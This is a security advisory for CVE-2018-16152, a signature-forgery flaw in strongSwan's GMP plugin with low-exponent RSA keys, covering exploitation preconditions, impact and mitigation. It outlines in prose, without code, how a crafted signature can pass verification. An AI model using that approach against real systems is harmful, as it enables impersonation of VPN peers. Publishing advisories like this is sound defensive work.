CVE-2018-16152

Vulnerability

A vulnerability exists in the verify_emsa_pkcs1_signature() function in gmp_rsa_public_key.c of the strongSwan GMP plugin (versions 4.x and 5.x before 5.7.0). The implementation does not reject excess data in the digestAlgorithm.parameters field during PKCS#1 v1.5 signature verification. This allows a remote attacker to forge RSA signatures when small public exponents (e.g., e=3) are used. The issue is a variant of CVE-2006-4790 and CVE-2014-1568 [1], [2].

Exploitation

An attacker needs network access to a system that uses the GMP plugin and RSA keys with a low public exponent (e=3). The attacker must also have knowledge of the public key (which is typically public). The attack exploits lenient ASN.1 parsing in the signature verification code, where the implementation does not strictly check that the DER-encoded digestAlgorithm.parameters field is absent when the algorithm identifier does not require parameters. By crafting a malicious signature whose decrypted value does not exactly match the expected PKCS#1 v1.5 format (allowing extra data in the ASN.1 structure), the attacker can produce a valid-looking signature without the private key [1].

Impact

Successful exploitation allows an attacker to forge RSA signatures, potentially leading to impersonation of legitimate peers when RSA signatures are used for IKEv2 authentication. The impact is a breach of authentication integrity, enabling man-in-the-middle attacks or unauthorized access [1].

Mitigation

The vulnerability is fixed in strongSwan version 5.7.0, released on 2018-09-24. Users should upgrade to this version or later. The Gentoo GLSA 201811-16 also recommends updating to version 5.7.1 or later. If upgrading is not possible, using RSA keys with a larger public exponent (e.g., 65537) and/or avoiding the GMP plugin (using the default plugin) reduces exposure. No other workaround is available [2].